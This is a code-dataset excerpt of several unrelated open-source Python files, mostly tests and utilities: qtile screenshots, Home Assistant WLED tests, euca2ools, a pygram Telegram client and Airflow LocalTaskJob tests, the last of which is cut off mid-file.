text
stringlengths 4
1.02M
| meta
dict |
---|---|
import argparse
import os
import sys
import time
from screenshots import Client, Screenshooter
def env(name, default):
return os.environ.get(name, default)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-a",
"--commands-after",
dest="commands_after",
default="",
help="Commands to run after finishing to take screenshots. Space-separated string.",
)
parser.add_argument(
"-b",
"--commands-before",
dest="commands_before",
default="",
help="Commands to run before starting to take screenshots. Space-separated string.",
)
parser.add_argument(
"-c",
"--clear",
dest="clear",
action="store_true",
default=False,
help="Whether to delete the PNG files after animating them into GIFs.",
)
parser.add_argument(
"-C",
"--comment",
dest="comment",
default="",
help="Comment to append at the end of the screenshot filenames.",
)
parser.add_argument(
"-d",
"--delay",
dest="delay",
default=env("DELAY", "1x1"),
help="Delay between each frame of the animated GIF. Default: 1x1.",
)
parser.add_argument(
"-g",
"--screenshot-group",
dest="screenshot_group",
default="s",
help="Group to switch to to take screenshots.",
)
parser.add_argument(
"-G",
"--geometry",
dest="geometry",
default=env("GEOMETRY", "240x135"),
help="The size of the generated screenshots (WIDTHxHEIGHT).",
)
parser.add_argument(
"-n",
"--name",
dest="name",
default="",
help="The name of the generated screenshot files . Don't append the extension.",
)
parser.add_argument(
"-o",
"--output-dir",
dest="output_dir",
default="docs/screenshots/layout",
help="Directory in which to write the screenshot files.",
)
parser.add_argument(
"-w",
"--windows",
dest="windows",
type=int,
default=3,
help="Number of windows to spawn.",
)
parser.add_argument(
"layout",
choices=[
"bsp",
"columns",
"matrix",
"monadtall",
"monadwide",
"ratiotile",
# "slice",
"stack",
"tile",
"treetab",
"verticaltile",
"zoomy",
],
help="Layout to use.",
)
parser.add_argument(
"commands",
nargs=argparse.ONE_OR_MORE,
help="Commands to run and take screenshots for.",
)
args = parser.parse_args()
client = Client()
# keep current group in memory, to switch back to it later
original_group = client.current_group()
# prepare layout
client.switch_to_group(args.screenshot_group)
client.prepare_layout(
args.layout,
args.windows,
args.commands_before.split(" ") if args.commands_before else [],
)
# wait a bit to make sure everything is in place
time.sleep(0.5)
# prepare screenshot output path prefix
output_dir = os.path.join(args.output_dir, args.layout)
os.makedirs(output_dir, exist_ok=True)
name = args.name or "_".join(args.commands) or args.layout
if args.comment:
name += "-{}".format(args.comment)
output_prefix = os.path.join(output_dir, name)
print("Shooting {}".format(output_prefix))
# run commands and take a screenshot between each, animate into a gif at the end
screen = Screenshooter(output_prefix, args.geometry, args.delay)
screen.shoot()
for cmd in args.commands:
client.run_layout_command(cmd)
time.sleep(0.05)
screen.shoot()
screen.animate(clear=args.clear)
if args.commands_after:
for cmd in args.commands_after.split(" "):
client.run_layout_command(cmd)
time.sleep(0.05)
# kill windows
client.kill_group_windows()
# switch back to original group
client.switch_to_group(original_group)
sys.exit(0)
| {
"content_hash": "aa1a7a55e631b36fb9d3cebcf7751bbd",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 92,
"avg_line_length": 26.853503184713375,
"alnum_prop": 0.5633301707779886,
"repo_name": "qtile/qtile",
"id": "205c9a783d7375985ae44b36c78d6df303a31a85",
"size": "4239",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "docs/screenshots/take_one.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "625"
},
{
"name": "Python",
"bytes": "2202676"
},
{
"name": "Shell",
"bytes": "8090"
}
],
"symlink_target": ""
} |
"""Tests for the WLED light platform."""
import aiohttp
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_HS_COLOR,
ATTR_RGB_COLOR,
ATTR_TRANSITION,
ATTR_WHITE_VALUE,
DOMAIN as LIGHT_DOMAIN,
)
from homeassistant.components.wled.const import (
ATTR_INTENSITY,
ATTR_PALETTE,
ATTR_PLAYLIST,
ATTR_PRESET,
ATTR_SPEED,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_ICON,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import HomeAssistant
from tests.components.wled import init_integration
from tests.test_util.aiohttp import AiohttpClientMocker
async def test_rgb_light_state(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test the creation and values of the WLED lights."""
await init_integration(hass, aioclient_mock)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
# First segment of the strip
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Solid"
assert state.attributes.get(ATTR_HS_COLOR) == (37.412, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 128
assert state.attributes.get(ATTR_PALETTE) == "Default"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_SPEED) == 32
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light")
assert entry
assert entry.unique_id == "aabbccddeeff_0"
# Second segment of the strip
state = hass.states.get("light.wled_rgb_light_1")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Blink"
assert state.attributes.get(ATTR_HS_COLOR) == (148.941, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 64
assert state.attributes.get(ATTR_PALETTE) == "Random Cycle"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_SPEED) == 16
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_1")
assert entry
assert entry.unique_id == "aabbccddeeff_1"
async def test_switch_change_state(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test the change of state of the WLED switches."""
await init_integration(hass, aioclient_mock)
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_ON
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_OFF
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_EFFECT: "Chase",
ATTR_ENTITY_ID: "light.wled_rgb_light",
ATTR_RGB_COLOR: [255, 0, 0],
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_BRIGHTNESS) == 42
assert state.attributes.get(ATTR_EFFECT) == "Chase"
assert state.attributes.get(ATTR_HS_COLOR) == (0.0, 100.0)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgb_light", ATTR_COLOR_TEMP: 400},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (28.874, 72.522)
async def test_light_error(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test error handling of the WLED switches."""
aioclient_mock.post("http://example.local:80/json/state", exc=aiohttp.ClientError)
await init_integration(hass, aioclient_mock)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state.state == STATE_UNAVAILABLE
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgb_light_1"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_1")
assert state.state == STATE_UNAVAILABLE
async def test_rgbw_light(
hass: HomeAssistant, aioclient_mock: AiohttpClientMocker
) -> None:
"""Test RGBW support for WLED."""
await init_integration(hass, aioclient_mock, rgbw=True)
state = hass.states.get("light.wled_rgbw_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (0.0, 100.0)
assert state.attributes.get(ATTR_WHITE_VALUE) == 139
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgbw_light", ATTR_COLOR_TEMP: 400},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgbw_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (28.874, 72.522)
assert state.attributes.get(ATTR_WHITE_VALUE) == 139
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: "light.wled_rgbw_light", ATTR_WHITE_VALUE: 100},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgbw_light")
assert state.state == STATE_ON
assert state.attributes.get(ATTR_HS_COLOR) == (28.874, 72.522)
assert state.attributes.get(ATTR_WHITE_VALUE) == 100
| {
"content_hash": "4173d231fb156ec29f2cc97ba0db9522",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 86,
"avg_line_length": 32.733333333333334,
"alnum_prop": 0.6673977753407488,
"repo_name": "leppa/home-assistant",
"id": "037081608af422906169098efc02a50fc1639142",
"size": "6383",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "tests/components/wled/test_light.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "18957740"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
} |
import os
import sys
import traceback
# Add the pulsar path
thispath = os.path.dirname(os.path.realpath(__file__))
psrpath = os.path.join(os.path.dirname(thispath), "modules")
sys.path.insert(0, psrpath)
import pulsar as psr
from pulsar.output import *
from pulsar.testing import *
from pulsar.system import *
from helper.SetOperations import test_set_operations
from helper.TestAtoms import nonane
def Run():
try:
tester = Tester("Testing System class - set operations")
tester.print_header()
atoms = list(nonane)
a1 = Atom(atoms[0])
a2 = Atom(atoms[0])
a3 = Atom(atoms[0])
a4 = Atom(atoms[0])
a1[0] += 1.0e-10 # Slightly different coords
a2[1] += 1.0e-10
a3[2] += 1.0e-10
a4.Z = 10 # Different Z
badatoms = [ a1, a2, a3, a4 ]
u = AtomSetUniverse()
for a in atoms:
u.insert(a)
s0 = System(u, False)
s1 = System(u, False)
s2 = System(u, True)
s3 = System(u, False)
s9 = System(u, False)
for it in atoms[:3]:
s1.insert(it)
for it in reversed(atoms):
s3.insert(it)
for it in atoms[3:]:
s9.insert(it)
################################
# Do basic testing of set stuff
################################
test_set_operations(tester, System, atoms, badatoms,
True, s0, s1, s2, s3, s9)
tester.print_results()
except Exception as e:
print_global_output("Caught exception in main handler. Contact the developers\n")
traceback.print_exc()
print_global_error("\n")
print_global_error(str(e))
print_global_error("\n")
psr.initialize(sys.argv, color = True, debug = True)
Run()
psr.finalize()
| {
"content_hash": "2ca8ee79c2ce40aea2552f9e3bf6efb6",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 87,
"avg_line_length": 23.189873417721518,
"alnum_prop": 0.550764192139738,
"repo_name": "pulsar-chem/Pulsar-Core",
"id": "6a796813af70de899f8474ed24b2458e67152db0",
"size": "1857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/old/Old2/Molecule_Set.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "7784"
},
{
"name": "C++",
"bytes": "1100500"
},
{
"name": "CMake",
"bytes": "24227"
},
{
"name": "Python",
"bytes": "739363"
},
{
"name": "Shell",
"bytes": "2851"
}
],
"symlink_target": ""
} |
from requestbuilder import Arg
from euca2ools.commands.ec2 import EC2Request
class AssociateDhcpOptions(EC2Request):
DESCRIPTION = 'Associate a DHCP option set with a VPC'
ARGS = [Arg('DhcpOptionsId', metavar='DHCPOPTS', help='''ID of the DHCP
option set to associate, or "default" (required)'''),
Arg('-c', '--vpc', dest='VpcId', metavar='VPC', required=True,
help='''ID of the VPC to associate the DHCP option set
with (required)''')]
def print_result(self, _):
print self.tabify(('DHCPOPTIONS',
self.args['DhcpOptionsId'], self.args['VpcId']))
| {
"content_hash": "b90da8e1cd4f83390fa31396951a31ff",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 75,
"avg_line_length": 41.125,
"alnum_prop": 0.60790273556231,
"repo_name": "vasiliykochergin/euca2ools",
"id": "d981ad8499a2d73a0ff7d13be103d7b48cbcf519",
"size": "2000",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "euca2ools/commands/ec2/associatedhcpoptions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1220919"
},
{
"name": "Shell",
"bytes": "872"
}
],
"symlink_target": ""
} |
import asyncio
import curses
import weakref
from datetime import datetime
import npyscreen
from DictObject import DictObject
from npyscreen import ActionFormV2WithMenus, wgwidget as widget
from pytg.exceptions import NoResponse, IllegalResponseException
from pytg.utils import coroutine
from pygram import printed, check_version
from pygram.boxtitle import DialogBox, HistoryBox, ChatBox
from pygram.menu import CustomMenu
from pygram.pg_threading import PGThread
class PyGramForm(ActionFormV2WithMenus):
BLANK_LINES_BASE = 1
OK_BUTTON_BR_OFFSET = (1, 6)
CANCEL_BUTTON_BR_OFFSET = (5, 12)
OK_BUTTON_TEXT = "QUIT"
CANCEL_BUTTON_TEXT = "SEND"
MENUS = []
def __init__(self, *args, **kwargs):
self.TG = kwargs.pop('TG', None)
self.form_width = 30
self.receiver_thread = None
self.full_name = printed(self.TG.sender.get_self())
self.dialog_list = None
self.chat_history = None
self.chat_box = None
self.contacts_list = []
self.editw = 0
super().__init__(*args, **kwargs)
self.current_peer = None
self.version_checked = False
def display_menu_advert_at(self):
return 2, self.lines - 1
def draw_form(self):
super().draw_form()
menu_advert = " " + self.__class__.MENU_KEY + ": Menu "
x, y = self.display_menu_advert_at()
if isinstance(menu_advert, bytes):
menu_advert = menu_advert.decode('utf-8', 'replace')
self.add_line(
y, x,
menu_advert,
self.make_attributes_list(menu_advert, curses.A_NORMAL),
self.columns - x
)
def set_up_exit_condition_handlers(self):
super().set_up_exit_condition_handlers()
self.how_exited_handers.update({
widget.EXITED_ESCAPE: self.find_quit_button
})
def find_quit_button(self):
self.editw = len(self._widgets__) - 1
def on_ok(self, direct=False):
if direct:
self.parentApp.switchForm(None)
ans = npyscreen.notify_yes_no('Are you sure, you want to quit?')
if ans:
self.TG.receiver.stop()
self.parentApp.switchForm(None)
def check_version(self, **keywords):
if not self.version_checked:
loop = keywords.get('loop')
result = loop.run_until_complete(check_version())
if not result:
npyscreen.notify("New version released please check.")
self.version_checked = True
def on_screen(self):
if not hasattr(self, 'checker_thread'):
loop = asyncio.get_event_loop()
self.checker_thread = PGThread(target=self.check_version, args=(), kwargs={'loop': loop})
self.checker_thread.daemon = True
self.checker_thread.start()
def on_cancel(self):
""" Message will be send """
if self.current_peer:
text = self.chat_box.entry_widget.value.strip()
if text:
send_status = self.TG.sender.send_msg(self.current_peer.print_name, text)
if send_status:
self.chat_box.entry_widget.value = ""
self.load_history(current_dialog=self.current_peer)
self.editw = self._widgets__.index(self.chat_box)
else:
npyscreen.notify_ok_cancel('Please select receiver first.')
def add_menu(self, name=None, *args, **keywords):
if not hasattr(self, '_NMenuList'):
self._NMenuList = []
_mnu = CustomMenu(name=name, *args, **keywords)
self._NMenuList.append(_mnu)
return weakref.proxy(_mnu)
def create(self):
self.dialog_list = self.add(DialogBox, name="Dialog List", scroll_exit=True,
editable=True, max_width=self.form_width,
max_height=self._max_physical()[0] - 10)
self.load_dialogs()
self.chat_history = self.add(HistoryBox, name="", scroll_exit=True,
editable=True, relx=self.form_width + 2, rely=2,
max_height=self._max_physical()[0] - 10, exit_left=True, exit_right=True)
self.chat_box = self.add(ChatBox, name='{}'.format(self.full_name), scroll_exit=True,
editable=True, max_height=5)
self.contacts_list_menu = self.add_menu(name="Contact List")
self.contacts_list_menu.addItemsFromList(
list(map(lambda x: (x, self.start_dialog, None, None, None, {'contact': x}), self.load_contacts_list()))
)
self.start_receiver()
def load_contacts_list(self):
self.contacts_list = self.TG.sender.contacts_list()
return self.contacts_list
def start_dialog(self, contact):
# start a chat with selected one, what about dialog_list?
contact.printed = printed(contact)
self.current_peer = contact
self.load_history(current_dialog=self.current_peer)
def start_receiver(self):
self.receiver_thread = PGThread(target=self.trigger_receiver)
self.receiver_thread.daemon = True
self.receiver_thread.start()
@coroutine
def message_loop(self):
try:
while True:
msg = (yield)
if msg.event != "message" or msg.own:
continue
else:
self.load_dialogs()
if self.current_peer:
if ((self.current_peer.peer_type == 'user' and
self.current_peer.peer_id == msg.sender.peer_id) or
(self.current_peer.peer_type == 'chat' and
self.current_peer.peer_id == msg.receiver.peer_id)):
self.load_history(trigger_movement=False, current_dialog=self.current_peer)
except (GeneratorExit, KeyboardInterrupt, TypeError, NoResponse) as err:
print(err)
pass
def trigger_receiver(self):
try:
self.TG.receiver.start()
self.TG.receiver.message(self.message_loop())
except TypeError:
npyscreen.notify("Sorry, An error occurred please restart the app :(")
self.on_ok(direct=True)
def load_dialogs(self):
dialog_list = list(reversed(self.TG.sender.dialog_list(retry_connect=True)))
# Formating display for dialogs
peer_index = None
for dial in dialog_list:
dial.printed = printed(dial)
if hasattr(self, 'current_peer') and dial == self.current_peer:
peer_index = dialog_list.index(dial)
try:
history = self.TG.sender.history(dial.print_name, 2, 0, retry_connect=True)
unread = len(list(filter(lambda x: x.unread, history)))
dial.unread = unread
except (IllegalResponseException, NoResponse):
dial.unread = 0
self.parentApp.dialog_list = dialog_list
self.dialog_list.values = dialog_list
self.dialog_list.entry_widget.value = peer_index
self.dialog_list.update()
self.find_next_editable()
self.editw -= 1
def load_history(self, **keywords):
current_dialog = keywords.get('current_dialog', None)
if current_dialog:
self.current_peer = current_dialog
self.chat_history.entry_widget.lines_placed = False
self.chat_history.name = (getattr(current_dialog, 'title', '') or
getattr(current_dialog, 'printed', '') or 'Unknown')
while True:
try:
history = self.TG.sender.history(current_dialog.print_name, 100, 0, retry_connect=True)
break
except NoResponse:
continue
unread = list(filter(lambda x: x.unread, history))
if unread:
unread_index = history.index(unread[0])
history = history[:unread_index] + ["--New Messages--"] + history[unread_index:]
self.chat_history.values = list(
filter(lambda x: x,
map(lambda x: (
isinstance(x, str) and x or '{} ({})\n\t{}'.format(
printed(getattr(x, 'from')),
datetime.fromtimestamp(getattr(x, 'date', '')),
(getattr(x, 'text', '') or
getattr(getattr(x, 'media', DictObject()), 'address', '')))),
history)))
self.parentApp.fill_history()
self.find_next_editable()
self.editw -= 1
self.chat_history.entry_widget.lines_placed = True
self.chat_history.update()
self.chat_history.entry_widget.h_show_end(None)
self.find_next_editable()
self.editw -= 1
if keywords.get('trigger_movement', True):
# Force movement to chat box
for wid in self._widgets__:
if wid == self.chat_box:
self.editw = self._widgets__.index(wid)
self._widgets__[self.editw].editing = True
self._widgets__[self.editw].edit()
self._widgets__[self.editw].display()
break
wid.editing = False
wid.how_exited = widget.EXITED_DOWN
self.handle_exiting_widgets(wid.how_exited)
self.load_dialogs()
self.dialog_list.update()
| {
"content_hash": "aad9e86fdde1635b30abf5cae76820fd",
"timestamp": "",
"source": "github",
"line_count": 243,
"max_line_length": 116,
"avg_line_length": 39.97119341563786,
"alnum_prop": 0.5546175229074436,
"repo_name": "RedXBeard/pygram",
"id": "4d595583596fa3ea18083dee461273a5b3c51350",
"size": "9713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pygram/actionform.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23976"
}
],
"symlink_target": ""
} |
from flask import Blueprint
frontend = Blueprint('frontend', __name__)
from . import views
| {
"content_hash": "a83573be6286b5cc3bdedcf574368ae9",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 42,
"avg_line_length": 15.666666666666666,
"alnum_prop": 0.723404255319149,
"repo_name": "rblack42/rstRefactored",
"id": "e269d7590a67b1f539388c7352d4ef5ff75ea98d",
"size": "94",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rst2/frontend/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Puppet",
"bytes": "1430"
},
{
"name": "Python",
"bytes": "6979"
}
],
"symlink_target": ""
} |
import multiprocessing
import os
import time
import unittest
import uuid
from unittest import mock
import pytest
from mock import patch
from airflow import settings
from airflow.exceptions import AirflowException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models.dag import DAG
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
# Assert that difference small enough
delta = (time2 - time1).total_seconds()
self.assertAlmostEqual(delta, job.heartrate, delta=0.05)
@pytest.mark.xfail(condition=True, reason="This test might be flaky in postgres/mysql")
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
@pytest.mark.quarantined
def test_localtaskjob_maintain_heart_rate(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
def test_mark_failure_on_failure_callback(self):
"""
Test that ensures that mark_failure in the UI fails
the task, and executes on_failure_callback
"""
data = {'called': False}
def check_failure(context):
self.assertEqual(context['dag_run'].dag_id, 'test_mark_failure')
data['called'] = True
def task_function(ti):
print("python_callable run in pid %s", os.getpid())
with create_session() as session:
self.assertEqual(State.RUNNING, ti.state)
ti.log.info("Marking TI as failed 'externally'")
ti.state = State.FAILED
session.merge(ti)
session.commit()
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
data['reached_end_of_sleep'] = True
with DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE) as dag:
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_failure_callback=check_failure)
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
with timeout(30):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callbable above bigger
job1.run()
ti.refresh_from_db()
self.assertEqual(ti.state, State.FAILED)
self.assertTrue(data['called'])
self.assertNotIn('reached_end_of_sleep', data,
'Task should not have been allowed to run to completion')
@pytest.mark.quarantined
def test_mark_success_on_success_callback(self):
"""
Test that ensures that where a task is marked suceess in the UI
on_success_callback gets executed
"""
data = {'called': False}
def success_callback(context):
self.assertEqual(context['dag_run'].dag_id,
'test_mark_success')
data['called'] = True
dag = DAG(dag_id='test_mark_success',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
task = DummyOperator(
